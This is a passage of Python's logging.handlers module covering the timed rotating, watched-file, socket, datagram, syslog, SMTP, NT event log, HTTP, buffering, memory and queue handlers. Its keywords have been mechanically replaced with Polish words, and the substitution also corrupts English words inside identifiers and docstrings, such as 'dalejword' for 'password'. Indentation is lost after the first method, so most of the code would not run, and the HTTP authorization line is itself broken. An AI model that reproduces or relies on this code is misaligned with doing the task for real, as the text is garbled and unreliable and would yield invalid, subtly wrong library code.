    def __init__(self, filename, when='h', interval=1, backupCount=0, encoding=Nic, delay=Nieprawda, utc=Nieprawda, atTime=Nic):
        """
        Open the file in append mode and schedule the first rollover.
        """
        BaseRotatingHandler.__init__(self, filename, 'a', encoding, delay)
        self.when = when.upper()
        self.backupCount = backupCount
        self.utc = utc
        self.atTime = atTime
        # Calculate the real rollover interval, which is just the number of
        # seconds between rollovers. Also set the filename suffix used when
        # a rollover occurs. Current 'when' events supported:
        # S - Seconds
        # M - Minutes
        # H - Hours
        # D - Days
        # midnight - roll over at midnight
        # W{0-6} - roll over on a certain day; 0 - Monday
        #
        # Case of the 'when' specifier is not important; lower or upper case
        # will work.
        jeżeli self.when == 'S':
            self.interval = 1 # one second
            self.suffix = "%Y-%m-%d_%H-%M-%S"
            self.extMatch = r"^\d{4}-\d{2}-\d{2}_\d{2}-\d{2}-\d{2}(\.\w+)?$"
        albo_inaczej self.when == 'M':
            self.interval = 60 # one minute
            self.suffix = "%Y-%m-%d_%H-%M"
            self.extMatch = r"^\d{4}-\d{2}-\d{2}_\d{2}-\d{2}(\.\w+)?$"
        albo_inaczej self.when == 'H':
            self.interval = 60 * 60 # one hour
            self.suffix = "%Y-%m-%d_%H"
            self.extMatch = r"^\d{4}-\d{2}-\d{2}_\d{2}(\.\w+)?$"
        albo_inaczej self.when == 'D' albo self.when == 'MIDNIGHT':
            self.interval = 60 * 60 * 24 # one day
            self.suffix = "%Y-%m-%d"
            self.extMatch = r"^\d{4}-\d{2}-\d{2}(\.\w+)?$"
        albo_inaczej self.when.startswith('W'):
            self.interval = 60 * 60 * 24 * 7 # one week
            jeżeli len(self.when) != 2:
                podnieś ValueError("You must specify a day dla weekly rollover z 0 to 6 (0 jest Monday): %s" % self.when)
            jeżeli self.when[1] < '0' albo self.when[1] > '6':
                podnieś ValueError("Invalid day specified dla weekly rollover: %s" % self.when)
            self.dayOfWeek = int(self.when[1])
            self.suffix = "%Y-%m-%d"
            self.extMatch = r"^\d{4}-\d{2}-\d{2}(\.\w+)?$"
        inaczej:
            podnieś ValueError("Invalid rollover interval specified: %s" % self.when)
        self.extMatch = re.compile(self.extMatch, re.ASCII)
        self.interval = self.interval * interval # multiply by units requested
        # Anchor the first rollover on the file's mtime when it already exists,
        # otherwise on the current time.
        jeżeli os.path.exists(filename):
            t = os.stat(filename)[ST_MTIME]
        inaczej:
            t = int(time.time())
        self.rolloverAt = self.computeRollover(t)
    def computeRollover(self, currentTime):
        """
        Work out the rollover time based on the specified time.
        """
        result = currentTime + self.interval
        # If we are rolling over at midnight or weekly, then the interval is already known.
        # What we need to figure out is WHEN the next interval is. In other words,
        # if you are rolling over at midnight, then your base interval is 1 day,
        # but you want to start that one day clock at midnight, not now. So, we
        # have to fudge the rolloverAt value in order to trigger the first rollover
        # at the right time. After that, the regular interval will take care of
        # the rest. Note that this code doesn't care about leap seconds. :)
        jeżeli self.when == 'MIDNIGHT' albo self.when.startswith('W'):
            # This could be done with less code, but I wanted it to be clear
            jeżeli self.utc:
                t = time.gmtime(currentTime)
            inaczej:
                t = time.localtime(currentTime)
            currentHour = t[3]
            currentMinute = t[4]
            currentSecond = t[5]
            currentDay = t[6]
            # r is the number of seconds left between now and the next rotation
            jeżeli self.atTime jest Nic:
                rotate_ts = _MIDNIGHT
            inaczej:
                rotate_ts = ((self.atTime.hour * 60 + self.atTime.minute)*60 +
                    self.atTime.second)
            r = rotate_ts - ((currentHour * 60 + currentMinute) * 60 +
                currentSecond)
            jeżeli r < 0:
                # Rotate time is before the current time (for example when
                # self.rotateAt is 13:45 and it is now 14:15), rotation is
                # tomorrow.
                r += _MIDNIGHT
                currentDay = (currentDay + 1) % 7
            result = currentTime + r
            # If we are rolling over on a certain day, add in the number of days until
            # the next rollover, but offset by 1 since we just calculated the time
            # until the next day starts. There are three cases:
            # Case 1) The day to rollover is today; in this case, do nothing
            # Case 2) The day to rollover is further in the interval (i.e., today is
            #         day 2 (Wednesday) and rollover is on day 6 (Sunday). Days to
            #         next rollover is simply 6 - 2 - 1, or 3.
            # Case 3) The day to rollover is behind us in the interval (i.e., today
            #         is day 5 (Saturday) and rollover is on day 3 (Thursday).
            #         Days to rollover is 6 - 5 + 3, or 4. In this case, it's the
            #         number of days left in the current week (1) plus the number
            #         of days in the next week until the rollover day (3).
            # The calculations described in 2) and 3) above need to have a day added.
            # This is because the above time calculation takes us to midnight on this
            # day, i.e. the start of the next day.
            jeżeli self.when.startswith('W'):
                day = currentDay # 0 is Monday
                jeżeli day != self.dayOfWeek:
                    jeżeli day < self.dayOfWeek:
                        daysToWait = self.dayOfWeek - day
                    inaczej:
                        daysToWait = 6 - day + self.dayOfWeek + 1
                    newRolloverAt = result + (daysToWait * (60 * 60 * 24))
                    jeżeli nie self.utc:
                        dstNow = t[-1]
                        dstAtRollover = time.localtime(newRolloverAt)[-1]
                        jeżeli dstNow != dstAtRollover:
                            jeżeli nie dstNow: # DST kicks in before next rollover, so we need to deduct an hour
                                addend = -3600
                            inaczej: # DST bows out before next rollover, so we need to add an hour
                                addend = 3600
                            newRolloverAt += addend
                    result = newRolloverAt
        zwróć result
def shouldRollover(self, record):
"""
Determine jeżeli rollover should occur.
record jest nie used, jako we are just comparing times, but it jest needed so
the method signatures are the same
"""
t = int(time.time())
jeżeli t >= self.rolloverAt:
zwróć 1
zwróć 0
def getFilesToDelete(self):
"""
Determine the files to delete when rolling over.
More specific than the earlier method, which just used glob.glob().
"""
dirName, baseName = os.path.split(self.baseFilename)
fileNames = os.listdir(dirName)
result = []
prefix = baseName + "."
plen = len(prefix)
dla fileName w fileNames:
jeżeli fileName[:plen] == prefix:
suffix = fileName[plen:]
jeżeli self.extMatch.match(suffix):
result.append(os.path.join(dirName, fileName))
result.sort()
jeżeli len(result) < self.backupCount:
result = []
inaczej:
result = result[:len(result) - self.backupCount]
zwróć result
def doRollover(self):
"""
do a rollover; w this case, a date/time stamp jest appended to the filename
when the rollover happens. However, you want the file to be named dla the
start of the interval, nie the current time. If there jest a backup count,
then we have to get a list of matching filenames, sort them oraz remove
the one przy the oldest suffix.
"""
jeżeli self.stream:
self.stream.close()
self.stream = Nic
# get the time that this sequence started at oraz make it a TimeTuple
currentTime = int(time.time())
dstNow = time.localtime(currentTime)[-1]
t = self.rolloverAt - self.interval
jeżeli self.utc:
timeTuple = time.gmtime(t)
inaczej:
timeTuple = time.localtime(t)
dstThen = timeTuple[-1]
jeżeli dstNow != dstThen:
jeżeli dstNow:
addend = 3600
inaczej:
addend = -3600
timeTuple = time.localtime(t + addend)
dfn = self.rotation_filename(self.baseFilename + "." +
time.strftime(self.suffix, timeTuple))
jeżeli os.path.exists(dfn):
os.remove(dfn)
self.rotate(self.baseFilename, dfn)
jeżeli self.backupCount > 0:
dla s w self.getFilesToDelete():
os.remove(s)
jeżeli nie self.delay:
self.stream = self._open()
newRolloverAt = self.computeRollover(currentTime)
dopóki newRolloverAt <= currentTime:
newRolloverAt = newRolloverAt + self.interval
#If DST changes oraz midnight albo weekly rollover, adjust dla this.
jeżeli (self.when == 'MIDNIGHT' albo self.when.startswith('W')) oraz nie self.utc:
dstAtRollover = time.localtime(newRolloverAt)[-1]
jeżeli dstNow != dstAtRollover:
jeżeli nie dstNow: # DST kicks w before next rollover, so we need to deduct an hour
addend = -3600
inaczej: # DST bows out before next rollover, so we need to add an hour
addend = 3600
newRolloverAt += addend
self.rolloverAt = newRolloverAt
klasa WatchedFileHandler(logging.FileHandler):
"""
A handler dla logging to a file, which watches the file
to see jeżeli it has changed dopóki w use. This can happen because of
usage of programs such jako newsyslog oraz logrotate which perform
log file rotation. This handler, intended dla use under Unix,
watches the file to see jeżeli it has changed since the last emit.
(A file has changed jeżeli its device albo inode have changed.)
If it has changed, the old file stream jest closed, oraz the file
opened to get a new stream.
This handler jest nie appropriate dla use under Windows, because
under Windows open files cannot be moved albo renamed - logging
opens the files przy exclusive locks - oraz so there jest no need
dla such a handler. Furthermore, ST_INO jest nie supported under
Windows; stat always returns zero dla this value.
This handler jest based on a suggestion oraz patch by Chad J.
Schroeder.
"""
def __init__(self, filename, mode='a', encoding=Nic, delay=Nieprawda):
logging.FileHandler.__init__(self, filename, mode, encoding, delay)
self.dev, self.ino = -1, -1
self._statstream()
def _statstream(self):
jeżeli self.stream:
sres = os.fstat(self.stream.fileno())
self.dev, self.ino = sres[ST_DEV], sres[ST_INO]
def emit(self, record):
"""
Emit a record.
First check jeżeli the underlying file has changed, oraz jeżeli it
has, close the old stream oraz reopen the file to get the
current stream.
"""
# Reduce the chance of race conditions by stat'ing by path only
# once oraz then fstat'ing our new fd jeżeli we opened a new log stream.
# See issue #14632: Thanks to John Mulligan dla the problem report
# oraz patch.
spróbuj:
# stat the file by path, checking dla existence
sres = os.stat(self.baseFilename)
wyjąwszy FileNotFoundError:
sres = Nic
# compare file system stat przy that of our stream file handle
jeżeli nie sres albo sres[ST_DEV] != self.dev albo sres[ST_INO] != self.ino:
jeżeli self.stream jest nie Nic:
# we have an open file handle, clean it up
self.stream.flush()
self.stream.close()
self.stream = Nic # See Issue #21742: _open () might fail.
# open a new file handle oraz get new stat info z that fd
self.stream = self._open()
self._statstream()
logging.FileHandler.emit(self, record)
klasa SocketHandler(logging.Handler):
"""
A handler klasa which writes logging records, w pickle format, to
a streaming socket. The socket jest kept open across logging calls.
If the peer resets it, an attempt jest made to reconnect on the next call.
The pickle which jest sent jest that of the LogRecord's attribute dictionary
(__dict__), so that the receiver does nie need to have the logging module
installed w order to process the logging event.
To unpickle the record at the receiving end into a LogRecord, use the
makeLogRecord function.
"""
def __init__(self, host, port):
"""
Initializes the handler przy a specific host address oraz port.
When the attribute *closeOnError* jest set to Prawda - jeżeli a socket error
occurs, the socket jest silently closed oraz then reopened on the next
logging call.
"""
logging.Handler.__init__(self)
self.host = host
self.port = port
jeżeli port jest Nic:
self.address = host
inaczej:
self.address = (host, port)
self.sock = Nic
self.closeOnError = Nieprawda
self.retryTime = Nic
#
# Exponential backoff parameters.
#
self.retryStart = 1.0
self.retryMax = 30.0
self.retryFactor = 2.0
def makeSocket(self, timeout=1):
"""
A factory method which allows subclasses to define the precise
type of socket they want.
"""
jeżeli self.port jest nie Nic:
result = socket.create_connection(self.address, timeout=timeout)
inaczej:
result = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
result.settimeout(timeout)
spróbuj:
result.connect(self.address)
wyjąwszy OSError:
result.close() # Issue 19182
podnieś
zwróć result
def createSocket(self):
"""
Try to create a socket, using an exponential backoff with
a max retry time. Thanks to Robert Olson dla the original patch
(SF #815911) which has been slightly refactored.
"""
now = time.time()
# Either retryTime jest Nic, w which case this
# jest the first time back after a disconnect, albo
# we've waited long enough.
jeżeli self.retryTime jest Nic:
attempt = Prawda
inaczej:
attempt = (now >= self.retryTime)
jeżeli attempt:
spróbuj:
self.sock = self.makeSocket()
self.retryTime = Nic # next time, no delay before trying
wyjąwszy OSError:
#Creation failed, so set the retry time oraz return.
jeżeli self.retryTime jest Nic:
self.retryPeriod = self.retryStart
inaczej:
self.retryPeriod = self.retryPeriod * self.retryFactor
jeżeli self.retryPeriod > self.retryMax:
self.retryPeriod = self.retryMax
self.retryTime = now + self.retryPeriod
def send(self, s):
"""
Send a pickled string to the socket.
This function allows dla partial sends which can happen when the
network jest busy.
"""
jeżeli self.sock jest Nic:
self.createSocket()
#self.sock can be Nic either because we haven't reached the retry
#time yet, albo because we have reached the retry time oraz retried,
#but are still unable to connect.
jeżeli self.sock:
spróbuj:
self.sock.sendall(s)
wyjąwszy OSError: #pragma: no cover
self.sock.close()
self.sock = Nic # so we can call createSocket next time
def makePickle(self, record):
"""
Pickles the record w binary format przy a length prefix, oraz
returns it ready dla transmission across the socket.
"""
ei = record.exc_info
jeżeli ei:
# just to get traceback text into record.exc_text ...
dummy = self.format(record)
# See issue #14436: If msg albo args are objects, they may nie be
# available on the receiving end. So we convert the msg % args
# to a string, save it jako msg oraz zap the args.
d = dict(record.__dict__)
d['msg'] = record.getMessage()
d['args'] = Nic
d['exc_info'] = Nic
s = pickle.dumps(d, 1)
slen = struct.pack(">L", len(s))
zwróć slen + s
def handleError(self, record):
"""
Handle an error during logging.
An error has occurred during logging. Most likely cause -
connection lost. Close the socket so that we can retry on the
next event.
"""
jeżeli self.closeOnError oraz self.sock:
self.sock.close()
self.sock = Nic #try to reconnect next time
inaczej:
logging.Handler.handleError(self, record)
def emit(self, record):
"""
Emit a record.
Pickles the record oraz writes it to the socket w binary format.
If there jest an error przy the socket, silently drop the packet.
If there was a problem przy the socket, re-establishes the
socket.
"""
spróbuj:
s = self.makePickle(record)
self.send(s)
wyjąwszy Exception:
self.handleError(record)
def close(self):
"""
Closes the socket.
"""
self.acquire()
spróbuj:
sock = self.sock
jeżeli sock:
self.sock = Nic
sock.close()
logging.Handler.close(self)
w_końcu:
self.release()
klasa DatagramHandler(SocketHandler):
"""
A handler klasa which writes logging records, w pickle format, to
a datagram socket. The pickle which jest sent jest that of the LogRecord's
attribute dictionary (__dict__), so that the receiver does nie need to
have the logging module installed w order to process the logging event.
To unpickle the record at the receiving end into a LogRecord, use the
makeLogRecord function.
"""
def __init__(self, host, port):
"""
Initializes the handler przy a specific host address oraz port.
"""
SocketHandler.__init__(self, host, port)
self.closeOnError = Nieprawda
def makeSocket(self):
"""
The factory method of SocketHandler jest here overridden to create
a UDP socket (SOCK_DGRAM).
"""
jeżeli self.port jest Nic:
family = socket.AF_UNIX
inaczej:
family = socket.AF_INET
s = socket.socket(family, socket.SOCK_DGRAM)
zwróć s
def send(self, s):
"""
Send a pickled string to a socket.
This function no longer allows dla partial sends which can happen
when the network jest busy - UDP does nie guarantee delivery oraz
can deliver packets out of sequence.
"""
jeżeli self.sock jest Nic:
self.createSocket()
self.sock.sendto(s, self.address)
klasa SysLogHandler(logging.Handler):
"""
A handler klasa which sends formatted logging records to a syslog
server. Based on Sam Rushing's syslog module:
http://www.nightmare.com/squirl/python-ext/misc/syslog.py
Contributed by Nicolas Untz (after which minor refactoring changes
have been made).
"""
# z <linux/sys/syslog.h>:
# ======================================================================
# priorities/facilities are encoded into a single 32-bit quantity, where
# the bottom 3 bits are the priority (0-7) oraz the top 28 bits are the
# facility (0-big number). Both the priorities oraz the facilities map
# roughly one-to-one to strings w the syslogd(8) source code. This
# mapping jest included w this file.
#
# priorities (these are ordered)
LOG_EMERG = 0 # system jest unusable
LOG_ALERT = 1 # action must be taken immediately
LOG_CRIT = 2 # critical conditions
LOG_ERR = 3 # error conditions
LOG_WARNING = 4 # warning conditions
LOG_NOTICE = 5 # normal but significant condition
LOG_INFO = 6 # informational
LOG_DEBUG = 7 # debug-level messages
# facility codes
LOG_KERN = 0 # kernel messages
LOG_USER = 1 # random user-level messages
LOG_MAIL = 2 # mail system
LOG_DAEMON = 3 # system daemons
LOG_AUTH = 4 # security/authorization messages
LOG_SYSLOG = 5 # messages generated internally by syslogd
LOG_LPR = 6 # line printer subsystem
LOG_NEWS = 7 # network news subsystem
LOG_UUCP = 8 # UUCP subsystem
LOG_CRON = 9 # clock daemon
LOG_AUTHPRIV = 10 # security/authorization messages (private)
LOG_FTP = 11 # FTP daemon
# other codes through 15 reserved dla system use
LOG_LOCAL0 = 16 # reserved dla local use
LOG_LOCAL1 = 17 # reserved dla local use
LOG_LOCAL2 = 18 # reserved dla local use
LOG_LOCAL3 = 19 # reserved dla local use
LOG_LOCAL4 = 20 # reserved dla local use
LOG_LOCAL5 = 21 # reserved dla local use
LOG_LOCAL6 = 22 # reserved dla local use
LOG_LOCAL7 = 23 # reserved dla local use
priority_names = {
"alert": LOG_ALERT,
"crit": LOG_CRIT,
"critical": LOG_CRIT,
"debug": LOG_DEBUG,
"emerg": LOG_EMERG,
"err": LOG_ERR,
"error": LOG_ERR, # DEPRECATED
"info": LOG_INFO,
"notice": LOG_NOTICE,
"panic": LOG_EMERG, # DEPRECATED
"warn": LOG_WARNING, # DEPRECATED
"warning": LOG_WARNING,
}
facility_names = {
"auth": LOG_AUTH,
"authpriv": LOG_AUTHPRIV,
"cron": LOG_CRON,
"daemon": LOG_DAEMON,
"ftp": LOG_FTP,
"kern": LOG_KERN,
"lpr": LOG_LPR,
"mail": LOG_MAIL,
"news": LOG_NEWS,
"security": LOG_AUTH, # DEPRECATED
"syslog": LOG_SYSLOG,
"user": LOG_USER,
"uucp": LOG_UUCP,
"local0": LOG_LOCAL0,
"local1": LOG_LOCAL1,
"local2": LOG_LOCAL2,
"local3": LOG_LOCAL3,
"local4": LOG_LOCAL4,
"local5": LOG_LOCAL5,
"local6": LOG_LOCAL6,
"local7": LOG_LOCAL7,
}
#The map below appears to be trivially lowercasing the key. However,
#there's more to it than meets the eye - w some locales, lowercasing
#gives unexpected results. See SF #1524081: w the Turkish locale,
#"INFO".lower() != "info"
priority_map = {
"DEBUG" : "debug",
"INFO" : "info",
"WARNING" : "warning",
"ERROR" : "error",
"CRITICAL" : "critical"
}
def __init__(self, address=('localhost', SYSLOG_UDP_PORT),
facility=LOG_USER, socktype=Nic):
"""
Initialize a handler.
If address jest specified jako a string, a UNIX socket jest used. To log to a
local syslogd, "SysLogHandler(address="/dev/log")" can be used.
If facility jest nie specified, LOG_USER jest used. If socktype jest
specified jako socket.SOCK_DGRAM albo socket.SOCK_STREAM, that specific
socket type will be used. For Unix sockets, you can also specify a
socktype of Nic, w which case socket.SOCK_DGRAM will be used, falling
back to socket.SOCK_STREAM.
"""
logging.Handler.__init__(self)
self.address = address
self.facility = facility
self.socktype = socktype
jeżeli isinstance(address, str):
self.unixsocket = Prawda
self._connect_unixsocket(address)
inaczej:
self.unixsocket = Nieprawda
jeżeli socktype jest Nic:
socktype = socket.SOCK_DGRAM
self.socket = socket.socket(socket.AF_INET, socktype)
jeżeli socktype == socket.SOCK_STREAM:
self.socket.connect(address)
self.socktype = socktype
self.formatter = Nic
def _connect_unixsocket(self, address):
use_socktype = self.socktype
jeżeli use_socktype jest Nic:
use_socktype = socket.SOCK_DGRAM
self.socket = socket.socket(socket.AF_UNIX, use_socktype)
spróbuj:
self.socket.connect(address)
# it worked, so set self.socktype to the used type
self.socktype = use_socktype
wyjąwszy OSError:
self.socket.close()
jeżeli self.socktype jest nie Nic:
# user didn't specify falling back, so fail
podnieś
use_socktype = socket.SOCK_STREAM
self.socket = socket.socket(socket.AF_UNIX, use_socktype)
spróbuj:
self.socket.connect(address)
# it worked, so set self.socktype to the used type
self.socktype = use_socktype
wyjąwszy OSError:
self.socket.close()
podnieś
def encodePriority(self, facility, priority):
"""
Encode the facility oraz priority. You can dalej w strings albo
integers - jeżeli strings are dalejed, the facility_names oraz
priority_names mapping dictionaries are used to convert them to
integers.
"""
jeżeli isinstance(facility, str):
facility = self.facility_names[facility]
jeżeli isinstance(priority, str):
priority = self.priority_names[priority]
zwróć (facility << 3) | priority
def close (self):
"""
Closes the socket.
"""
self.acquire()
spróbuj:
self.socket.close()
logging.Handler.close(self)
w_końcu:
self.release()
def mapPriority(self, levelName):
"""
Map a logging level name to a key w the priority_names map.
This jest useful w two scenarios: when custom levels are being
used, oraz w the case where you can't do a straightforward
mapping by lowercasing the logging level name because of locale-
specific issues (see SF #1524081).
"""
zwróć self.priority_map.get(levelName, "warning")
ident = '' # prepended to all messages
append_nul = Prawda # some old syslog daemons expect a NUL terminator
def emit(self, record):
"""
Emit a record.
The record jest formatted, oraz then sent to the syslog server. If
exception information jest present, it jest NOT sent to the server.
"""
spróbuj:
msg = self.format(record)
jeżeli self.ident:
msg = self.ident + msg
jeżeli self.append_nul:
msg += '\000'
# We need to convert record level to lowercase, maybe this will
# change w the future.
prio = '<%d>' % self.encodePriority(self.facility,
self.mapPriority(record.levelname))
prio = prio.encode('utf-8')
# Message jest a string. Convert to bytes jako required by RFC 5424
msg = msg.encode('utf-8')
msg = prio + msg
jeżeli self.unixsocket:
spróbuj:
self.socket.send(msg)
wyjąwszy OSError:
self.socket.close()
self._connect_unixsocket(self.address)
self.socket.send(msg)
albo_inaczej self.socktype == socket.SOCK_DGRAM:
self.socket.sendto(msg, self.address)
inaczej:
self.socket.sendall(msg)
wyjąwszy Exception:
self.handleError(record)
klasa SMTPHandler(logging.Handler):
"""
A handler klasa which sends an SMTP email dla each logging event.
"""
def __init__(self, mailhost, fromaddr, toaddrs, subject,
credentials=Nic, secure=Nic, timeout=5.0):
"""
Initialize the handler.
Initialize the instance przy the z oraz to addresses oraz subject
line of the email. To specify a non-standard SMTP port, use the
(host, port) tuple format dla the mailhost argument. To specify
authentication credentials, supply a (username, dalejword) tuple
dla the credentials argument. To specify the use of a secure
protocol (TLS), dalej w a tuple dla the secure argument. This will
only be used when authentication credentials are supplied. The tuple
will be either an empty tuple, albo a single-value tuple przy the name
of a keyfile, albo a 2-value tuple przy the names of the keyfile oraz
certificate file. (This tuple jest dalejed to the `starttls` method).
A timeout w seconds can be specified dla the SMTP connection (the
default jest one second).
"""
logging.Handler.__init__(self)
jeżeli isinstance(mailhost, (list, tuple)):
self.mailhost, self.mailport = mailhost
inaczej:
self.mailhost, self.mailport = mailhost, Nic
jeżeli isinstance(credentials, (list, tuple)):
self.username, self.password = credentials
inaczej:
self.username = Nic
self.fromaddr = fromaddr
jeżeli isinstance(toaddrs, str):
toaddrs = [toaddrs]
self.toaddrs = toaddrs
self.subject = subject
self.secure = secure
self.timeout = timeout
def getSubject(self, record):
"""
Determine the subject dla the email.
If you want to specify a subject line which jest record-dependent,
override this method.
"""
zwróć self.subject
def emit(self, record):
"""
Emit a record.
Format the record oraz send it to the specified addressees.
"""
spróbuj:
zaimportuj smtplib
z email.utils zaimportuj formatdate
port = self.mailport
jeżeli nie port:
port = smtplib.SMTP_PORT
smtp = smtplib.SMTP(self.mailhost, port, timeout=self.timeout)
msg = self.format(record)
msg = "From: %s\r\nTo: %s\r\nSubject: %s\r\nDate: %s\r\n\r\n%s" % (
self.fromaddr,
",".join(self.toaddrs),
self.getSubject(record),
formatdate(), msg)
jeżeli self.username:
jeżeli self.secure jest nie Nic:
smtp.ehlo()
smtp.starttls(*self.secure)
smtp.ehlo()
smtp.login(self.username, self.password)
smtp.sendmail(self.fromaddr, self.toaddrs, msg)
smtp.quit()
wyjąwszy Exception:
self.handleError(record)
klasa NTEventLogHandler(logging.Handler):
"""
A handler klasa which sends events to the NT Event Log. Adds a
registry entry dla the specified application name. If no dllname jest
provided, win32service.pyd (which contains some basic message
placeholders) jest used. Note that use of these placeholders will make
your event logs big, jako the entire message source jest held w the log.
If you want slimmer logs, you have to dalej w the name of your own DLL
which contains the message definitions you want to use w the event log.
"""
def __init__(self, appname, dllname=Nic, logtype="Application"):
logging.Handler.__init__(self)
spróbuj:
zaimportuj win32evtlogutil, win32evtlog
self.appname = appname
self._welu = win32evtlogutil
jeżeli nie dllname:
dllname = os.path.split(self._welu.__file__)
dllname = os.path.split(dllname[0])
dllname = os.path.join(dllname[0], r'win32service.pyd')
self.dllname = dllname
self.logtype = logtype
self._welu.AddSourceToRegistry(appname, dllname, logtype)
self.deftype = win32evtlog.EVENTLOG_ERROR_TYPE
self.typemap = {
logging.DEBUG : win32evtlog.EVENTLOG_INFORMATION_TYPE,
logging.INFO : win32evtlog.EVENTLOG_INFORMATION_TYPE,
logging.WARNING : win32evtlog.EVENTLOG_WARNING_TYPE,
logging.ERROR : win32evtlog.EVENTLOG_ERROR_TYPE,
logging.CRITICAL: win32evtlog.EVENTLOG_ERROR_TYPE,
}
wyjąwszy ImportError:
print("The Python Win32 extensions dla NT (service, event "\
"logging) appear nie to be available.")
self._welu = Nic
def getMessageID(self, record):
"""
Return the message ID dla the event record. If you are using your
own messages, you could do this by having the msg dalejed to the
logger being an ID rather than a formatting string. Then, w here,
you could use a dictionary lookup to get the message ID. This
version returns 1, which jest the base message ID w win32service.pyd.
"""
zwróć 1
def getEventCategory(self, record):
"""
Return the event category dla the record.
Override this jeżeli you want to specify your own categories. This version
returns 0.
"""
zwróć 0
def getEventType(self, record):
"""
Return the event type dla the record.
Override this jeżeli you want to specify your own types. This version does
a mapping using the handler's typemap attribute, which jest set up w
__init__() to a dictionary which contains mappings dla DEBUG, INFO,
WARNING, ERROR oraz CRITICAL. If you are using your own levels you will
either need to override this method albo place a suitable dictionary w
the handler's typemap attribute.
"""
zwróć self.typemap.get(record.levelno, self.deftype)
def emit(self, record):
"""
Emit a record.
Determine the message ID, event category oraz event type. Then
log the message w the NT event log.
"""
jeżeli self._welu:
spróbuj:
id = self.getMessageID(record)
cat = self.getEventCategory(record)
type = self.getEventType(record)
msg = self.format(record)
self._welu.ReportEvent(self.appname, id, cat, type, [msg])
wyjąwszy Exception:
self.handleError(record)
def close(self):
"""
Clean up this handler.
You can remove the application name z the registry jako a
source of event log entries. However, jeżeli you do this, you will
nie be able to see the events jako you intended w the Event Log
Viewer - it needs to be able to access the registry to get the
DLL name.
"""
#self._welu.RemoveSourceFromRegistry(self.appname, self.logtype)
logging.Handler.close(self)
klasa HTTPHandler(logging.Handler):
"""
A klasa which sends records to a Web server, using either GET albo
POST semantics.
"""
def __init__(self, host, url, method="GET", secure=Nieprawda, credentials=Nic,
context=Nic):
"""
Initialize the instance przy the host, the request URL, oraz the method
("GET" albo "POST")
"""
logging.Handler.__init__(self)
method = method.upper()
jeżeli method nie w ["GET", "POST"]:
podnieś ValueError("method must be GET albo POST")
jeżeli nie secure oraz context jest nie Nic:
podnieś ValueError("context parameter only makes sense "
"przy secure=Prawda")
self.host = host
self.url = url
self.method = method
self.secure = secure
self.credentials = credentials
self.context = context
def mapLogRecord(self, record):
"""
Default implementation of mapping the log record into a dict
that jest sent jako the CGI data. Overwrite w your class.
Contributed by Franz Glasner.
"""
zwróć record.__dict__
def emit(self, record):
"""
Emit a record.
Send the record to the Web server jako a percent-encoded dictionary
"""
spróbuj:
zaimportuj http.client, urllib.parse
host = self.host
jeżeli self.secure:
h = http.client.HTTPSConnection(host, context=self.context)
inaczej:
h = http.client.HTTPConnection(host)
url = self.url
data = urllib.parse.urlencode(self.mapLogRecord(record))
jeżeli self.method == "GET":
jeżeli (url.find('?') >= 0):
sep = '&'
inaczej:
sep = '?'
url = url + "%c%s" % (sep, data)
h.putrequest(self.method, url)
# support multiple hosts on one IP address...
# need to strip optional :port z host, jeżeli present
i = host.find(":")
jeżeli i >= 0:
host = host[:i]
h.putheader("Host", host)
jeżeli self.method == "POST":
h.putheader("Content-type",
"application/x-www-form-urlencoded")
h.putheader("Content-length", str(len(data)))
jeżeli self.credentials:
zaimportuj base64
s = ('u%s:%s' % self.credentials).encode('utf-8')
s = 'Basic ' + base64.b64encode(s).strip()
h.putheader('Authorization', s)
h.endheaders()
jeżeli self.method == "POST":
h.send(data.encode('utf-8'))
h.getresponse() #can't do anything przy the result
wyjąwszy Exception:
self.handleError(record)
klasa BufferingHandler(logging.Handler):
"""
A handler klasa which buffers logging records w memory. Whenever each
record jest added to the buffer, a check jest made to see jeżeli the buffer should
be flushed. If it should, then flush() jest expected to do what's needed.
"""
def __init__(self, capacity):
"""
Initialize the handler przy the buffer size.
"""
logging.Handler.__init__(self)
self.capacity = capacity
self.buffer = []
def shouldFlush(self, record):
"""
Should the handler flush its buffer?
Returns true jeżeli the buffer jest up to capacity. This method can be
overridden to implement custom flushing strategies.
"""
zwróć (len(self.buffer) >= self.capacity)
def emit(self, record):
"""
Emit a record.
Append the record. If shouldFlush() tells us to, call flush() to process
the buffer.
"""
self.buffer.append(record)
jeżeli self.shouldFlush(record):
self.flush()
def flush(self):
"""
Override to implement custom flushing behaviour.
This version just zaps the buffer to empty.
"""
self.acquire()
spróbuj:
self.buffer = []
w_końcu:
self.release()
def close(self):
"""
Close the handler.
This version just flushes oraz chains to the parent class' close().
"""
spróbuj:
self.flush()
w_końcu:
logging.Handler.close(self)
klasa MemoryHandler(BufferingHandler):
"""
A handler klasa which buffers logging records w memory, periodically
flushing them to a target handler. Flushing occurs whenever the buffer
jest full, albo when an event of a certain severity albo greater jest seen.
"""
def __init__(self, capacity, flushLevel=logging.ERROR, target=Nic):
"""
Initialize the handler przy the buffer size, the level at which
flushing should occur oraz an optional target.
Note that without a target being set either here albo via setTarget(),
a MemoryHandler jest no use to anyone!
"""
BufferingHandler.__init__(self, capacity)
self.flushLevel = flushLevel
self.target = target
def shouldFlush(self, record):
"""
Check dla buffer full albo a record at the flushLevel albo higher.
"""
zwróć (len(self.buffer) >= self.capacity) albo \
(record.levelno >= self.flushLevel)
def setTarget(self, target):
"""
Set the target handler dla this handler.
"""
self.target = target
def flush(self):
"""
For a MemoryHandler, flushing means just sending the buffered
records to the target, jeżeli there jest one. Override jeżeli you want
different behaviour.
The record buffer jest also cleared by this operation.
"""
self.acquire()
spróbuj:
jeżeli self.target:
dla record w self.buffer:
self.target.handle(record)
self.buffer = []
w_końcu:
self.release()
def close(self):
"""
Flush, set the target to Nic oraz lose the buffer.
"""
spróbuj:
self.flush()
w_końcu:
self.acquire()
spróbuj:
self.target = Nic
BufferingHandler.close(self)
w_końcu:
self.release()
klasa QueueHandler(logging.Handler):
"""
This handler sends events to a queue. Typically, it would be used together
przy a multiprocessing Queue to centralise logging to file w one process
(in a multi-process application), so jako to avoid file write contention
between processes.
This code jest new w Python 3.2, but this klasa can be copy pasted into
user code dla use przy earlier Python versions.
"""
def __init__(self, queue):
"""
Initialise an instance, using the dalejed queue.
"""
logging.Handler.__init__(self)
self.queue = queue
def enqueue(self, record):
"""
Enqueue a record.
The base implementation uses put_nowait. You may want to override
this method jeżeli you want to use blocking, timeouts albo custom queue
implementations.
"""
self.queue.put_nowait(record)
def prepare(self, record):
"""
Prepares a record dla queuing. The object returned by this method jest
enqueued.
The base implementation formats the record to merge the message
oraz arguments, oraz removes unpickleable items z the record
in-place.
